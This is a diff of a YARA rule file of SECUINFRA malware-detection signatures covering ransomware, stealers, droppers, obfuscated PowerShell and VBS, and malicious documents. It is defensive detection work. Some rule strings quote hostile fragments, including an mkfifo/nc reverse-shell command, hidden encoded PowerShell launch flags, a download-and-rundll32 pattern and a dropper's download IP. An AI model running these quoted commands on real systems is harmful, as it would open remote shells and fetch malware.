 		tags = ""
 		tlp = "CLEAR"
+		hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4"
+		hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8"
+		hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f"
+		hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2"
 
 	strings:
-		$sosemanuk_prng = {48 8b 45 f8 48 01 45 e0 48 8b 45 f8 48 29 45 d8 48 8b 45 e8 8b 90 80 00 00 00 48 8b 45 f8 01 c2 48 8b 45 e8 89 90 80 00 00 00}
-		$sosemanuk_mul_a = {00 00 00 00 13 CF 9F E1 26 37 97 6B 35 F8 08 8A [992] DE 4D 5B B5 CD 82 C4 54 F8 7A CC DE EB B5 53 3F}
-		$sosemanuk_mul_ia = {00 00 00 00 CD 40 0F 18 33 80 1E 30 FE C0 11 28 [992] 1C 65 E2 9E D1 25 ED 86 2F E5 FC AE E2 A5 F3 B6}
-		$interpreter = "/lib64/ld-linux-x86-64.so.2"
-		$debug0 = "encrypt_bytes: too big data"
-		$debug1 = "Progress: %f"
-		$help = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]"
+		$s_protected = "This document is protected" wide
+		$s_click = "You have to double-click \"View\" button to open" wide
+		$s_imgFileName = "Untitled picture.jpg" wide
+		$script = "language=\"VBScript\""
+		$wsfExt = ".wsf" ascii wide
+		$GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22}
+		$endTmp = /rad.{5}\.tmp/
 
 	condition:
-		uint32be( 0x0 ) == 0x7F454C46 and all of ( $sosemanuk_* ) and $interpreter and 2 of ( $debug* ) and $help
+		uint32be( 0x0 ) == 0xE4525C7B and any of ( $s_* ) and $script and $wsfExt and $GUIDwsf and $endTmp
 }
 rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Bash_Feb23
 {
@@ -158293,165 +158597,102 @@ rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Bash_Feb23
 	condition:
 		$bash and $wait and any of ( $comment* ) and 2 of ( $kill* ) and $index and 4 of ( $ext* ) and 2 of ( $clean* )
 }
-rule SECUINFRA_MALWARE_Formbook_Filename_Stage_2 : FILE
-{
-	meta:
-		description = "No description has been set in the source file - SecuInfra"
-		author = "SECUINFRA Falcon Team"
-		id = "74ae157c-30b3-5f07-83a3-6bc9e854fa84"
-		date = "2022-02-19"
-		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/formbook.yar#L2-L14"
-		license_url = "N/A"
-		logic_hash = "707fa457a99b47419b0b77716ed1f61cdb493f04cc26a156f903a30ef30ac428"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		version = "0.1"
-
-	strings:
-		$name = "PDF-Scan180220225499044" ascii wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and $name
-}
-rule SECUINFRA_RANSOM_Magniber_LNK_Jan23
+rule SECUINFRA_RANSOM_Magniber_ISO_Jan23 : FILE
 {
 	meta:
-		description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method"
+		description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method"
 		author = "SECUINFRA Falcon Team"
-		id = "2459a9e9-a6bb-50fc-9920-7632fdec7e91"
+		id = "6d5a937d-ac31-5c59-8e93-3fadc772d132"
 		date = "2023-01-13"
 		modified = "2023-01-13"
 		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar#L1-L18"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar#L1-L24"
 		license_url = "N/A"
-		hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c"
-		logic_hash = "074611d74e382bb19a45b052b5b2cc186bf3667420cb1625e9bda37f2e9774c5"
+		hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6"
+		logic_hash = "238baa794f4a87102534f7d6901819aa1b5dbb8156d56fb311e9fb1a6bc77f30"
 		score = 75
-		quality = 70
-		tags = ""
+		quality = 68
+		tags = "FILE"
 		tlp = "CLEAR"
 
 	strings:
-		$netbiosName = "victim1" ascii fullword
-		$macAddress = {00 0C 29 07 E1 6D}
+		$magic = {43 44 30 30 31}
+		$tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39}
+		$msiMagic = {D0 CF 11 E0 A1 B1 1A E1}
+		$dosString = "!This program cannot be run in DOS mode" ascii
+		$lnkMagic = {4C 00 00 00}
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and all of them
+		filesize > 200KB and filesize < 800KB and all of them
 }
-rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Python_Feb23
-{
-	meta:
-		description = "Detects the ESXiArgs Ransomware encryption bash script"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "6e2d6695-b727-5b71-bfa0-e8290e057c36"
-		date = "2023-02-07"
-		modified = "2023-02-07"
-		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Python_Feb23.yar#L1-L31"
-		license_url = "N/A"
-		logic_hash = "b821d1829ab4fb5eea896156a303198d6531d734196f0f947aef5d46754e6ccb"
-		score = 75
-		quality = 70
-		tags = ""
-		tlp = "CLEAR"
-
-	strings:
-		$python = "#!/bin/python"
-		$desc = "This module starts debug tools"
-		$command0 = "server_namespace"
-		$command1 = "service_instance"
-		$command2 = "local"
-		$command3 = "operation_id"
-		$command4 = "envelope"
-		$cmd = "'mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb' % (host, port)"
-		$OpenSLPPort = "port = '427'"
-		$listener = "HTTPServer(('127.0.0.1', 8008), PostServer).serve_forever()"
 
-	condition:
-		$python and $desc and 4 of ( $command* ) and $cmd and $OpenSLPPort and $listener
-}
-rule SECUINFRA_MALWARE_Plugx_USB_Delivery_LNK_Jun23
+rule SECUINFRA_MAL_Redline_Certificate_Bosch : FILE
 {
 	meta:
-		description = "Detects PlugX-style Malware delivery via removable Drives (USB) - LNK File"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "14c2e37e-91d7-5b66-916f-a1544a69a6fc"
-		date = "2023-06-21"
-		modified = "2023-06-21"
-		reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar#L1-L31"
+		description = "Detects Certificate used by Redline Stealer"
+		author = "SECUINFRA Falcon Team"
+		id = "a91d0510-ab4e-5f22-bcce-9a42beff5190"
+		date = "2022-12-02"
+		modified = "2022-02-13"
+		reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L3-L16"
 		license_url = "N/A"
-		logic_hash = "afbbaf44e97b6db584780e0739bffd9c70e05e86284cb25b25a9d02cbeffff1f"
+		logic_hash = "b3084bee5151543c0931bef9d320805d9e4d63c25be029da4e592d5a0b080a0e"
 		score = 75
 		quality = 70
-		tags = ""
-		tlp = "CLEAR"
-
-	strings:
-		$lnk_magic = {4C 00 00 00 01 14 02 00}
-		$driveletter_4X = {4? 00 3A 00 5C 00 A0 00 5C}
-		$driveletter_5X = {5? 00 3A 00 5C 00 A0 00 5C}
-		$s_cmd = "C:\\Windows\\System32\\cmd.exe" ascii
-		$s_recBin = "\\RECYCLER.BIN\\" wide
-		$s_shell32 = "%SystemRoot%\\system32\\SHELL32.dll" wide
-		$s_comspec = "%ComSpec%" ascii
+		tags = "FILE"
 
 	condition:
-		$lnk_magic at 0x0 and any of ( $s_* ) and ( $driveletter_4X or $driveletter_5X )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and pe.signatures [ i ] . serial == "72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11" )
 }
-rule SECUINFRA_MALWARE_Plugx_USB_Delivery_Ini_Icon_Jun23
+
+rule SECUINFRA_MAL_Redline_Certificate_Geforce : FILE
 {
 	meta:
-		description = "Detects PlugX-style Malware delivery via removable Drives (USB) - Desktop.ini Icon File; could potentially yield FPs"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "faaa507f-8478-5412-be86-4cae7fe28d21"
-		date = "2023-06-21"
-		modified = "2023-06-21"
-		reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar#L33-L49"
+		description = "Detects Certificate used by Redline Stealer"
+		author = "SECUINFRA Falcon Team"
+		id = "70081810-704e-5734-8a78-f97e17989460"
+		date = "2022-02-13"
+		modified = "2022-02-13"
+		reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L18-L31"
 		license_url = "N/A"
-		logic_hash = "1cf552c4627073d13832cf0ac602a610e0919af9e9a197aa07fef5d6a414644b"
+		logic_hash = "04e9bfd886be1550b0efd22f0098cc13a5fb6e7cae30b866a4066d0c8f433367"
 		score = 75
 		quality = 70
-		tags = ""
-		tlp = "CLEAR"
-
-	strings:
-		$s_shellclassinfo = "[.ShellClassInfo]" ascii
-		$s_IconRes = "IconResource=C:\\Windows\\system32\\SHELL32.dll,7" ascii
+		tags = "FILE"
 
 	condition:
-		all of ( $s_* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and pe.signatures [ i ] . serial == "11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54" )
 }
-rule SECUINFRA_MALWARE_Plugx_USB_Delivery_Ini_Recbin_Jun23
+rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Manifest_Feb23
 {
 	meta:
-		description = "Detects PlugX-style Malware delivery via removable Drives (USB) - Desktop.ini Recycle Bin; could potentially yield FPs"
+		description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests"
 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "026eba63-12c1-55aa-b736-aea0494c1ab9"
-		date = "2023-06-21"
-		modified = "2023-06-21"
-		reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar#L51-L70"
+		id = "f24f7e03-3cc5-5214-b6d2-205b69898636"
+		date = "2023-02-01"
+		modified = "2023-02-07"
+		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "af5a1f20e46d9db3a9b50b5d8845e60f058c2885a560756266afbd8f3a01bf1e"
-		score = 75
+		logic_hash = "4e3de25fdad9d76cefbb191424a739368b521c4f234656c397f4122debe749fa"
+		score = 65
 		quality = 70
 		tags = ""
 		tlp = "CLEAR"
 
 	strings:
-		$s_shellclassinfo = "[.ShellClassInfo]" ascii
-		$s_IconRes = "CLSID = {645FF040-5081-101B-9F08-00AA002F954E}" ascii
-		$neg_LRN = "shell32.dll,-8964" ascii
+		$xlmns = "http://schemas.microsoft.com/appx/manifest/"
+		$identity = "OID.2.25.311729368913984317654407730594956997722=1"
+		$s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\""
+		$s_capability = "runFullTrust"
+		$s_peExt = ".exe"
 
 	condition:
-		all of ( $s_* ) and not $neg_LRN
+		uint32be( 0x0 ) == 0x3C3F786D and $xlmns and $identity and 2 of ( $s* )
 }
-rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll_1 : POWERSHELL DOWNLOAD FILE
+rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll : POWERSHELL DOWNLOAD FILE
 {
 	meta:
 		description = "Detect a Download to %temp% and execution with rundll32.exe"
@@ -158497,6 +158738,55 @@ rule SECUINFRA_SUSP_Powershell_Base64_Decode : POWERSHELL B64 FILE
 	condition:
 		filesize < 500KB and $b64_decode
 }
+rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE
+{
+	meta:
+		description = "Detects typical staging directories being referenced inside lnk files"
+		author = "SECUINFRA Falcon Team"
+		id = "459ed2e6-133c-5cde-bf49-95bf8a5eb8c8"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/lnk.yar#L31-L46"
+		license_url = "N/A"
+		logic_hash = "3f2a04702b39bce48fc85aa68f39e6062c3b5ee37667eb086222a866a5e438e4"
+		score = 65
+		quality = 70
+		tags = "FILE"
+
+	strings:
+		$header = {4c00 0000 0114 0200 0000}
+		$public = "$env:public" wide
+
+	condition:
+		filesize < 20KB and ( $header at 0 ) and $public
+}
+rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Installer_Feb23
+{
+	meta:
+		description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "beaf08a8-a1c3-5d9c-b7cb-81a49c5bc2ec"
+		date = "2023-02-01"
+		modified = "2023-02-07"
+		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar#L1-L22"
+		license_url = "N/A"
+		logic_hash = "ad3f0545b2fe285adf67f053c8b422126a1bdff1b6835631280442495d975d16"
+		score = 50
+		quality = 30
+		tags = ""
+		tlp = "CLEAR"
+
+	strings:
+		$s_manifest = "AppxManifest.xml"
+		$s_block = "AppxBlockMap.xml"
+		$s_peExt = ".exe"
+		$sig = "AppxSignature.p7x"
+
+	condition:
+		uint16be( 0x0 ) == 0x504B and 2 of ( $s* ) and not $sig
+}
 rule SECUINFRA_MALWARE_Onenote_Delivery_Jan23
 {
 	meta:
@@ -158528,51 +158818,24 @@ rule SECUINFRA_MALWARE_Onenote_Delivery_Jan23
 		$webReq = "Invoke-WebRequest -Uri"
 		$bitsadmin = "bitsadmin /transfer"
 		$wscript = "WScript.Shell" nocase
-		$autoOpen = "Sub AutoOpen()"
-		$root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")"
-		$wsfExt = ".wsf" ascii wide
-		$vbsExt = ".vbs" ascii wide
-		$cmd = "cmd /c" nocase
-		$batch = "@echo off"
-		$batExt = ".bat" ascii wide
-		$delExit = "(goto) 2>nul & del \"%~f0\"..exit /b"
-		$dosString = "!This program cannot be run in DOS mode"
-		$exeExt = ".exe" ascii wide
-		$imageFile = "button_click-to-view-document.png" wide
-		$click = "click to view document" nocase wide
-		$path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide
-		$path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide
-		$path3 = "C:\\Users\\julien.galleron\\Downloads" wide
-
-	condition:
-		uint32be( 0x0 ) == 0xE4525C7B and 3 of them
-}
-rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Manifest_Feb23
-{
-	meta:
-		description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "f24f7e03-3cc5-5214-b6d2-205b69898636"
-		date = "2023-02-01"
-		modified = "2023-02-07"
-		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar#L1-L25"
-		license_url = "N/A"
-		logic_hash = "4e3de25fdad9d76cefbb191424a739368b521c4f234656c397f4122debe749fa"
-		score = 65
-		quality = 70
-		tags = ""
-		tlp = "CLEAR"
-
-	strings:
-		$xlmns = "http://schemas.microsoft.com/appx/manifest/"
-		$identity = "OID.2.25.311729368913984317654407730594956997722=1"
-		$s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\""
-		$s_capability = "runFullTrust"
-		$s_peExt = ".exe"
+		$autoOpen = "Sub AutoOpen()"
+		$root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")"
+		$wsfExt = ".wsf" ascii wide
+		$vbsExt = ".vbs" ascii wide
+		$cmd = "cmd /c" nocase
+		$batch = "@echo off"
+		$batExt = ".bat" ascii wide
+		$delExit = "(goto) 2>nul & del \"%~f0\"..exit /b"
+		$dosString = "!This program cannot be run in DOS mode"
+		$exeExt = ".exe" ascii wide
+		$imageFile = "button_click-to-view-document.png" wide
+		$click = "click to view document" nocase wide
+		$path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide
+		$path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide
+		$path3 = "C:\\Users\\julien.galleron\\Downloads" wide
 
 	condition:
-		uint32be( 0x0 ) == 0x3C3F786D and $xlmns and $identity and 2 of ( $s* )
+		uint32be( 0x0 ) == 0xE4525C7B and 3 of them
 }
 rule SECUINFRA_SUSP_Discord_Attachments_URL : PE DOWNLOAD FILE
 {
@@ -158669,105 +158932,237 @@ rule SECUINFRA_SUSP_Netsh_Firewall_Command : PE FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( $netsh_delete or $netsh_add )
 }
-rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE
+rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll_1 : POWERSHELL DOWNLOAD
 {
 	meta:
-		description = "Detects typical staging directories being referenced inside lnk files"
+		description = "Detect a Download to %temp% and execution with rundll32.exe"
 		author = "SECUINFRA Falcon Team"
-		id = "459ed2e6-133c-5cde-bf49-95bf8a5eb8c8"
-		date = "2022-02-27"
-		modified = "2022-02-27"
+		id = "f7a9d2e6-bebf-598b-9e59-db0a3001b9f9"
+		date = "2022-09-02"
+		modified = "2022-02-19"
 		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/lnk.yar#L31-L46"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/PowerShell_Misc/download_variations.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "3f2a04702b39bce48fc85aa68f39e6062c3b5ee37667eb086222a866a5e438e4"
+		logic_hash = "7982438c032127349fb1c3477a23bab1c92eb68d9c3b26e2f5fb0a8c332dbc44"
 		score = 65
 		quality = 70
-		tags = "FILE"
+		tags = "POWERSHELL, DOWNLOAD"
 
 	strings:
-		$header = {4c00 0000 0114 0200 0000}
-		$public = "$env:public" wide
+		$location = "$Env:temp" nocase
+		$download = "downloadfile(" nocase
+		$rundll = "rundll32.exe"
 
 	condition:
-		filesize < 20KB and ( $header at 0 ) and $public
+		$location and $download and $rundll
 }
-rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Installer_Feb23
+
+rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716
 {
 	meta:
-		description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages"
+		description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716"
 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "beaf08a8-a1c3-5d9c-b7cb-81a49c5bc2ec"
-		date = "2023-02-01"
-		modified = "2023-02-07"
-		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar#L1-L22"
+		id = "1b76f428-f2a8-5d1d-a78c-b4a70ac4f5db"
+		date = "2023-03-07"
+		modified = "2023-03-07"
+		reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar#L3-L20"
 		license_url = "N/A"
-		logic_hash = "ad3f0545b2fe285adf67f053c8b422126a1bdff1b6835631280442495d975d16"
+		logic_hash = "456008db725b8348f9f3851bb9aae9990e7613e1b9056846b121605c3e080297"
 		score = 50
-		quality = 30
-		tags = ""
+		quality = 45
+		tags = "CVE-2023-21716"
 		tlp = "CLEAR"
 
 	strings:
-		$s_manifest = "AppxManifest.xml"
-		$s_block = "AppxBlockMap.xml"
-		$s_peExt = ".exe"
-		$sig = "AppxSignature.p7x"
+		$fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/
 
 	condition:
-		uint16be( 0x0 ) == 0x504B and 2 of ( $s* ) and not $sig
+		uint32be( 0x0 ) == 0x7B5C7274 and !fonttbl_len [ 1 ] > 256 and console.log ( "[!] Inflated fonttable with length: " , !fonttbl_len [ 1 ] )
 }
-rule SECUINFRA_DROPPER_Vjw0Rm_Stage_1 : JAVASCRIPT DROPPER VJW0RM FILE
+rule SECUINFRA_OBFUS_Powershell_Execution : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
+		description = "Detects some variations of obfuscated PowerShell code to execute further PowerShell code"
 		author = "SECUINFRA Falcon Team"
-		id = "a07f80e4-56c3-5b75-be64-648bc1fde964"
-		date = "2022-02-19"
+		id = "b32c2a92-599c-5916-a335-dc996dcdc1bf"
+		date = "2022-09-02"
 		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/Vjw0rm.yar#L2-L19"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "e5cc23431239e8a650369729050809cf6fe2acc58941086f79ce004b4f506eed"
+		logic_hash = "b201774edc4a20a0035cd68898a785a6c2fc03fb8739d515196e428d4a88af70"
 		score = 75
-		quality = 20
-		tags = "JAVASCRIPT, DROPPER, VJW0RM, FILE"
-		version = "0.1"
+		quality = 70
+		tags = "FILE"
 
 	strings:
-		$a1 = "$$$"
-		$a2 = "microsoft.xmldom"
-		$a3 = "eval"
-		$a4 = "join(\"\")"
+		$a1 = "-nop -w hiddEn -Ep bypass -Enc" ascii nocase
+		$a2 = "-noP -sta -w 1 -enc" ascii nocase
+		$b1 = "SQBFAF"
 
 	condition:
-		( uint16( 0 ) == 0x7566 or uint16( 0 ) == 0x6176 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x660a ) and filesize < 60KB and all of ( $a* )
+		filesize < 300KB and $b1 and 1 of ( $a* )
 }
-rule SECUINFRA_DROPPER_Asyncrat_VBS_February_2022_1 : FILE
+rule SECUINFRA_OBFUS_Powershell_Replace_Tilde : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
+		description = "Detects usage of Replace to replace tilde. Often observed in obfuscation"
 		author = "SECUINFRA Falcon Team"
-		id = "80f84c2f-7af0-55c1-bc06-d605beae3e33"
-		date = "2022-02-21"
-		modified = "2022-02-21"
-		reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/asyncrat.yar#L2-L18"
+		id = "59b68982-01ae-588a-9802-bb92c72342a8"
+		date = "2022-10-02"
+		modified = "2022-02-27"
+		reference = "https://bazaar.abuse.ch/sample/4c391b57d604c695925938bfc10ceb4673edd64e9655759c2aead9e12b3e17cf/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L19-L32"
 		license_url = "N/A"
-		logic_hash = "80c86b0cbb7382135bb9ae8c80ac42f499081fe1fe48fadf21f0e136bcc04358"
+		logic_hash = "a2693757f9aedc1019a94a15ae00f87af852d319aa698dadd7f9bb98128622a0"
 		score = 75
 		quality = 70
 		tags = "FILE"
 
 	strings:
-		$a1 = "http://3.145.46.6/"
-		$b1 = "Const HIDDEN_WINDOW = 0"
-		$b2 = "GetObject(\"winmgmts:\\\\"
-		$c = "replace("
+		$a = ".Replace(\"~\",\"0\")"
 
 	condition:
-		filesize < 10KB and ( $a1 or ( all of ( $b* ) and #c > 10 ) )
+		filesize < 400KB and $a
+}
+rule SECUINFRA_OBFUS_VBS_Reverse_Startup : FILE
+{
+	meta:
+		description = "Detecs reversed StartUp Path. Sometimes used as obfuscation"
+		author = "SECUINFRA Falcon Team"
+		id = "ecb96e30-0ac0-530a-83af-bb030f7dce4c"
+		date = "2022-02-27"
+		modified = "2022-02-27"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/vbs_obfuscation.yar#L2-L13"
+		license_url = "N/A"
+		logic_hash = "7b4d56d3bbe8d16d5e01fa9a021a368feb28b8b062860df76a2569966a97b8bc"
+		score = 75
+		quality = 70
+		tags = "FILE"
+
+	strings:
+		$reverse = "\\putratS\\smargorP\\uneM" wide nocase
+
+	condition:
+		filesize < 200KB and $reverse
+}
+rule SECUINFRA_OBFUS_Javascript_Wscript_Hex_Strings_Usage
+{
+	meta:
+		description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT"
+		author = "SECUINFRA Falcon Team"
+		id = "dd55753e-4f7b-56be-a6d4-66f1d7dc8747"
+		date = "2022-12-02"
+		modified = "2022-02-13"
+		reference = "https://github.com/SIFalcon/Detection"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/javascript_obfuscation.yar#L2-L19"
+		license_url = "N/A"
+		logic_hash = "62bc3261b3c2e902a82423239a7ee0bcedfccbeeeda11833b935197144dc7c35"
+		score = 75
+		quality = 70
+		tags = ""
+
+	strings:
+		$wscript = "= WScript["
+		$hex_enc_str1 = "\\x63\\x72\\x65\\x61"
+		$hex_enc_str2 = "\\x73\\x63\\x72\\x69"
+		$hex_enc_str3 = "\\x71\\x75\\x69\\x74"
+		$hex_enc_str4 = "\\x41\\x72\\x67\\x75"
+
+	condition:
+		#wscript> 30 and 2 of ( $hex_enc_str* )
+}
+rule SECUINFRA_APT_Bitter_Maldoc_Verify : CVE_2018_0798
+{
+	meta:
+		description = "Detects Bitter (T-APT-17) shellcode in oleObject (CVE-2018-0798)"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "8e0e32d3-f00e-5145-9386-f42ddca703ae"
+		date = "2022-06-01"
+		modified = "2022-07-05"
+		reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L11-L40"
+		license_url = "N/A"
+		logic_hash = "1d30e2ad0d99d274a4e3dd029ff41ec05e8ba4160bea37762bce1bb5286493d8"
+		score = 75
+		quality = 70
+		tags = "CVE-2018-0798"
+		tlp = "WHITE"
